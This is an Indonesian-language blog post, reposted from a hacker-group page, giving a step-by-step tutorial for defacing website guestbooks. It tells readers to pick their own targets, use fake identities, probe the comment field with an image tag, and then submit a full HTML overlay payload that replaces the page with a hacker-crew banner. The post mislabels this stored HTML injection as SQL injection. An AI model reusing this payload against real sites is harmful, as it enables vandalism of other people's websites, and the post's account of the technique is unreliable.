Dengan menggunakan teknik SQL Injection, kita bisa mendeface guestbook (bukutamu) baik file php,asp,cfm,cgi,html dan lain2.
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. www.target.my/guestbook.php
Maka yg perlu kamu lakukan adalah mengisi kolom2 guestbook yg tersedia. Kamu nggak perlu mengisi kolom guestbook nya dgn identitas asli, cukup identitas palsu saja.
contoh :
Nama : boneka lucu
Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
Asal : toko boneka
Komentar : <img src="http://img289.imageshack.us/img289/3525/bart5fi.gif">
Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan sebuah gambar.
Trus klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb.
2. Selanjutnya buka url/browsing baru trus ketik target tadi www.target.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab "refresh" di samping url/browsing. Nah...muncul deh gambar yg kita masukin tadi di guestbook tsb. Berarti guestbook tsb bisa dideface.
Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan <img src="http://img289.imageshack.us/img289/3525/bart5fi.gif"> berarti guestbook tsb nggak bisa dideface. Kamu jgn kecewa ! cari target yg lain.
3. Kalo udah muncul gambar yg kita masukkan tadi, buka lagi guesbook tsb.
Trus isi lagi kolom2 guestbook yg tersedia.
contoh :
Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :
</DIV><DIV align=left><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><center><br><img border="0" src="http://img478.imageshack.us/img478/3472/hb6dr.jpg" width="473" height="253"><br><br><br><font face="Arial" color="#339999" size="6"><strong>J4mbi H4ck3r</strong></font><br><br><embed src="http://www.selbys.com/images/shotgun.swf" width="191" height="252"></embed><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Special Thank's<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">PeNc0peT_CiNtA<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Dedicated All Crew<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Jambihackerlink & Solohackerlink<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Hey admin......do you a need help ?<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Matrix.Dal.Net - #Jambihackerlink</font><br><br><br><strong><font face="Arial" size="6" color="#339999"><marquee width="30%">We ready cybernetic war !!! </marquee></font></strong></DIV></DIV>
Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.
Catatan :
Sebelum kamu memasukkan script diatas tadi, kamu edit dulu kata2 nya sesuai keinginan kamu.
4. Klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb.
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : www.target.my/guestbook.php
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
Sumber : http://jambihackerlink.googlepages.com/DefaceGuestbook.htm
Tuesday, January 5, 2010
Deface situs Guestbook (buku tamu)
By Unknown
Posted at 11:25 PM
No comments
About the Author
Nulla sagittis convallis arcu. Sed sed nunc. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.
View all posts by: BT9
:.
0 komentar: